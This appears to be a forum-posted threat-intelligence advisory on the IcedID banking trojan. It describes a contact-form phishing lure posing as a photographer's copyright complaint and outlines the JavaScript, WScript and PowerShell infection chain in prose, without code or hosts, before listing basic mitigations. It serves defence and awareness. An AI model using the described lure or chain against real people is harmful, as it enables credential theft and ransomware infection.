IcedID Banking Trojan Malware Threat Intel Advisory

###### Advisory Type Malware Intelligence
###### Malware Name IcedID
###### Malware Aliases BokBot
###### Malware Type Banking Trojan
###### Target OS Windows

Executive Summary

First noticed in 2017, IcedID is a banking trojan that steals financial information. IcedID has also been leveraged as a dropper for other malware and in the infection stage of ransomware operations.

This malware follows multiple delivery methods, out of which phishing emails with macro embedded attachments are the most prevalent. In a recent campaign involving IcedID, attackers abused website contact forms of multiple enterprises, used emails laced with malicious links, which when clicked downloaded a malicious .zip file. These emails, usually, tend to create a sense of urgency, provoking immediate action.

For instance, the sender pretends to be a photographer threatening legal action against the company for using his photos on their site, without permission. The sender then shares a malicious link which purports to be evidence that proves the incident. On clicking the link, however, the recipient is navigated to a Google page that downloads the malicious .zip file.

Technical Analysis

The phishing emails that IcedID campaigns use contain a malicious link, that when clicked on loads a Google page. This page then requires the unsuspecting victim to sign in with their google credentials. Upon signing in a malicious zip file is automatically downloaded on the victim’s machine. If at all the first link fails, they are redirected to a .top domain which then leads to a Google User Content page that downloads the malicious zip file.

Stages of execution:

  • The zip file contains a malicious JavaScript that is executed via WScript
  • A Shell object is created after executing the previous JS file
  • The Shell object launches PowerShell to download the IcedID payload in .dat format
  • The IcedID payload is well encrypted to escape detection


Technical Impact
  • IcedID is a banking trojan that steals the victim’s banking credentials and other financial information in the infected system and sends the information gathered to the attacker’s C2.
  • IcedID also acts as a loader for other types of payloads like ransomware, furthering other forms of attacks.
Business Impact
  • The banking trojan affects the privacy of its victims and abuses their financial information.
  • Infecting the system with ransomware will have an adverse impact on the business and its reputation.


  • Raise awareness about phishing emails and malicious links.
  • Use Multi-Factor Authentication for all accounts.
  • Users are advised to patch their systems and always be up to date.
  • Use the latest AV software.



1 Like